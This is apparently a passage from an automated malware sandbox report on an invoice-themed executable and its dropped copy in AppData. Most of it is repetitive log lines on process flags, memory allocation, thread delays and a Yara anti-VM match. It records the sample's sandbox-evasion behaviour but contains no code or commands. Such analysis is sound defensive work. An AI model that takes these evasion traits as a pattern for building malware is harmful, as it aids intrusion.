Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GhrKoSGuCdvpJ.exe PID: 7032, type: MEMORYSTR

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: AC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 4470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 7290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 6880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 8290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 9290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Memory allocated: 2C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 3250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 5250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 7AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 8AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 8C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 9C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 3160000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 3230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Memory allocated: 3160000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599870	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597733	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597514	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597385	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594494	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599445
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599216
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599106
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598900
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598623
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598296
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597092
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596084
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595811
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595692
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595223
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594547
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594109
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 593999
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 593885

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4815	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6041	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Window / User API: threadDelayed 2673	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Window / User API: threadDelayed 7158	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Window / User API: threadDelayed 2942
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Window / User API: threadDelayed 6907

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7988	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 420	Thread sleep count: 2673 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599870s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 420	Thread sleep count: 7158 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597843s >= -30000s	Jump to behavior
